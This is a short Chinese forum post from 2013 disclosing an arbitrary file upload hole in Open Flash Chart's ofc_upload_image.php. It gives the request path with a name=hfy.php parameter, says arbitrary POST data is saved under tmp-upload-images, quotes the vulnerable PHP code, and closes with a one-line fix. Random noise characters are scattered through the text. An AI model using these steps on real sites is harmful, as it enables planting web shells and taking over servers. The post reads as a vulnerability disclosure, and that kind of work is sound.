POST 数据漏洞文件执行任意后缀文件保存
0 R8 m. M# w4 Z7 c 漏洞文件/chart/php-ofc-library/ofc_upload_image.php* l) ~3 p+ E! x }# f I% `2 ~* R
3 ]7 y5 y) P% ~
利用:
, p- ?; H+ p' e j/chart/php-ofc-library/ofc_upload_image.php?name=hfy.php hfy.php 文件名
! l. m" Z! a: p: A" [. D! q/ V5 |5 e. m& I
Post任意数据- y ?8 ^. X s, D
保存位置http://localhost/chart/tmp-upload-images/hfy.php. [- B* J+ j; V6 G$ d9 d
- Z& [1 W; [+ d/ A' t
( b0 v3 Y) B1 P9 Z+ A最新版wss漏洞文件,即使是收费版本也有的,在新浪商店部署的demo~8 I9 S- z% O% h. n1 w
7 q* o+ z$ S& k, A0 S X$ Z4 J<?php& ]' k" l8 ^5 p7 y2 s1 r3 \8 H A
1 l3 L2 l! r% H# y, |" r0 ]//5 A6 g- F4 d4 y3 D
// In Open Flash Chart -> save_image debug mode, you
$ o. t0 x2 a' w: R/ }4 ]* |0 l. X// will see the 'echo' text in a new window.
) {% W& p6 t5 S1 D/ H( q+ G1 c, K- Z//
$ H$ H# _& m+ D& A8 e6 p, V
" q* i2 c5 {" V7 n& E4 i/*
7 q m# ^' B; i
; ^2 G% K! ?# T* Hprint_r( $_GET );$ E. j* W" | c- @: e2 t A4 V
print_r( $_POST );
/ c/ e$ p* r0 I8 _3 o( K4 r% aprint_r( $_FILES );
/ k4 d' f% n) b# h/ L) o" _8 \0 c( t$ m
print_r( $GLOBALS );3 o; [3 t% g4 e1 A% d
print_r( $GLOBALS["HTTP_RAW_POST_DATA"] );
! D2 e9 @. {7 ^ m! ?
: h1 V. U8 R% S8 u- q" V2 D*/; }0 [: u/ J2 W! k
// default path for the image to be stored //9 ^; ]6 v: X* b9 }
$default_path = '../tmp-upload-images/';2 H1 Z6 p' V# e8 K g
) A: B4 n/ r8 `if (!file_exists($default_path)) mkdir($default_path, 0777, true);7 ]8 y. J5 n, ~* B7 w* y, Q+ t
' p; C3 ]$ U7 W; V& _2 w// full path to the saved image including filename //$ s Y+ ]& _: I
$destination = $default_path . basename( $_GET[ 'name' ] );
! C. @3 Q* E% ^. F) {9 p; Q& b5 J; Q( b# w. O n- {
echo 'Saving your image to: '. $destination;
& @7 N. G/ }5 B2 S# B// print_r( $_POST );' M5 a/ T+ p/ F& w3 d, e$ b
// print_r( $_SERVER ); G- ~% z4 Y, ]# D9 R1 Q
// echo $HTTP_RAW_POST_DATA;# Z R" O ^; h( ~7 \
/ B5 b9 C2 p8 Z
//! |( `1 [$ B6 u F
// POST data is usually string data, but we are passing a RAW .png
+ ~3 v+ O1 C/ q' s" j0 e// so PHP is a bit confused and $_POST is empty. But it has saved
4 P3 y! \8 n& z& Z// the raw bits into $HTTP_RAW_POST_DATA* n6 G3 E3 u2 z. B7 f* y; Z* @( W
//: U' {! @) L8 n2 Y
: N4 Y" \" T- d2 @6 @2 i" N$ }8 u
$jfh = fopen($destination, 'w') or die("can't open file");9 \0 U1 a4 e3 t; `8 E
fwrite($jfh, $HTTP_RAW_POST_DATA);8 s( \* N+ T* Y# u/ N. W8 Y
fclose($jfh);
9 Q/ s" } |9 C1 B7 D" F9 L( Q& k' W9 ]3 C
//+ @- I; m% a+ `
// LOOK:
" Z# Q2 M& h* E1 F% m//% o7 E: h1 {+ G' P# V
exit();5 w! o: P2 `: B8 j( \0 y
//% p. [3 x5 \. y
// PHP5:
/ j% C0 L& M4 _9 d$ Y//
- u' u* A5 c% `9 ?& H
; _1 ~/ f+ b# {; ]* E
; ^( D: ~ i; ]& P// default path for the image to be stored //" r# y4 P( m# O; o7 Y9 g$ H
$default_path = 'tmp-upload-images/';% V. A& g7 F3 w4 C5 r6 d
) `4 Q2 M) c; I4 `if (!file_exists($default_path)) mkdir($default_path, 0777, true);
( s# n5 x) I7 f# \& }+ v
1 f! U$ }- n( E* N: c/ A// full path to the saved image including filename //6 _ }' M5 d" x4 s% S# Z* m
$destination = $default_path . basename( $_FILES[ 'Filedata' ][ 'name' ] );
; u7 k/ P% I/ H* j+ k8 e$ l/ c: n; H% S+ m) [. L( p
// move the image into the specified directory //7 P' O0 q& U* S
if (move_uploaded_file($_FILES[ 'Filedata' ][ 'tmp_name' ], $destination)) {( A5 `% G! W: {* Q% C: I
echo "The file " . basename( $_FILES[ 'Filedata' ][ 'name' ] ) . " has been uploaded;";
1 {( _* }9 |$ z* n% E D; b3 ]1 Z6 c} else {
4 X- s. K# H3 z. i) ? echo "FILE UPLOAD FAILED";
/ G- N! Z* x. r! d: U2 l3 O}" u4 J6 f9 f6 l5 P
0 ~* f* e' o: I/ m; q
5 f! Y% v O. w1 T3 G) a
?>, \" [$ X3 S7 p4 e5 D! Y2 i8 ]
. K# V6 M) i0 |% a
, G8 A$ ?- a: I: F6 s. d1 g: b6 ^5 ]# l) D( T
% N5 R" g8 Q$ @
) _4 S$ \6 a! O( n! w; K8 i# i
/ `7 ?& `) A- ^' H, q s+ d修复方案: 3 e1 V% s+ V+ t. ^5 j7 @1 L
这个漏洞文件就是个杯具,怎么破,加权限验证,后缀等验证~,自己搞 : ?. b) M+ K3 M j, v' \5 l
) f: g0 E8 Q7 ~; _
3 ^: `* _: q! K
' K& s k, s2 S+ g3 P9 h$ C
( W2 o+ C2 [% ?. z; v, S2 L |
发表于 2013-2-23 12:38:58
收藏
支持
反对